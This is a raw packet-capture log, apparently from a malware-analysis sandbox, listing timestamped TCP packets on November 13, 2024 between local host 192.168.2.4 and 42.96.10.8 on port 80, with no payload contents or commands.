                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358102083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358103991 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358110905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358119965 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358119965 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358146906 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358146906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358158112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358166933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358175039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358184099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358196974 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358203888 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358251095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358262062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358270884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358289957 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358303070 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358623981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358632088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358638048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358659983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358666897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358675003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358680010 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358686924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358694077 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358696938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358704090 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358715057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358722925 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358730078 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358732939 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358742952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358751059 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358753920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358764887 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358771086 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358799934 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358809948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358819008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358828068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358836889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358850002 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358870983 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358969927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358978987 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358983994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358989000 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358999014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.359008074 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.359009027 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.359019041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.359042883 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363168955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363213062 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363215923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363226891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363253117 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363289118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363297939 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363307953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363322020 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363329887 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363336086 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363369942 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363415003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363424063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363432884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363456964 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363481998 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363547087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363558054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363567114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363574982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363594055 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363615036 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363617897 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363625050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363634109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363642931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363647938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363656044 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363676071 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363703012 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363750935 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363781929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363790989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363822937 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363847971 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363857985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363868952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363883972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363884926 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363893986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363902092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363912106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363919973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363926888 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363929987 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363943100 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363965034 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363965034 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363975048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.363985062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.364013910 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.364016056 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.364027023 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.364028931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.364042044 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.364051104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.364073992 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.364085913 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.364129066 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.364140034 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.364149094 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.364161968 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.364171028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.364171982 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.364212036 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.364356041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.364365101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.364373922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.364383936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.364396095 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.364407063 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.364464045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.364506960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.364512920 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.364545107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.364553928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.364588976 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.364590883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.364599943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.364622116 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.364975929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.364984989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.364995003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.365004063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.365012884 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.365039110 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.365080118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.365098000 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.365106106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.365128994 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.365142107 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.365204096 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.365214109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.365228891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.365237951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.365243912 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.365261078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.365271091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.365277052 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.365279913 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.365294933 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.365308046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.365317106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.365325928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.365339994 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.365361929 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.365401030 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.365410089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.365417957 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.365426064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.365436077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.365442991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.365448952 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.365454912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.365462065 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.365488052 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.365500927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.365510941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.365544081 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.365560055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.365570068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.365576982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.365587950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.365597010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.365613937 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.365627050 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.365638018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.365648031 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.365964890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366014004 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366019964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366029978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366069078 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366081953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366092920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366101027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366121054 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366202116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366210938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366220951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366230965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366251945 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366271973 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366334915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366375923 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366406918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366415977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366449118 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366473913 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366482973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366487980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366497993 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366512060 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366539955 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366552114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366561890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366568089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366596937 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366637945 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366647005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366655111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366679907 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366691113 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366714001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366724014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366729021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366738081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366750002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366759062 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366764069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366775036 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366781950 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366784096 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366796017 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366816044 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366861105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366869926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366878986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366889000 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366899014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366913080 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366923094 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366950989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.366991043 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367016077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367024899 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367034912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367044926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367055893 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367058039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367074013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367084980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367091894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367098093 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367098093 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367101908 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367115021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367131948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367132902 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367144108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367151976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367151976 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367162943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367181063 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367209911 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367233038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367244005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367253065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367270947 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367317915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367327929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367337942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367347956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367352962 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367357016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367367983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367371082 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367386103 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367388964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367398024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367430925 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367461920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367470980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367486954 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367495060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367501974 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367503881 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367515087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367522955 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367523909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367537022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367547989 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367583990 CET4973380192.168.2.442.96.10.8
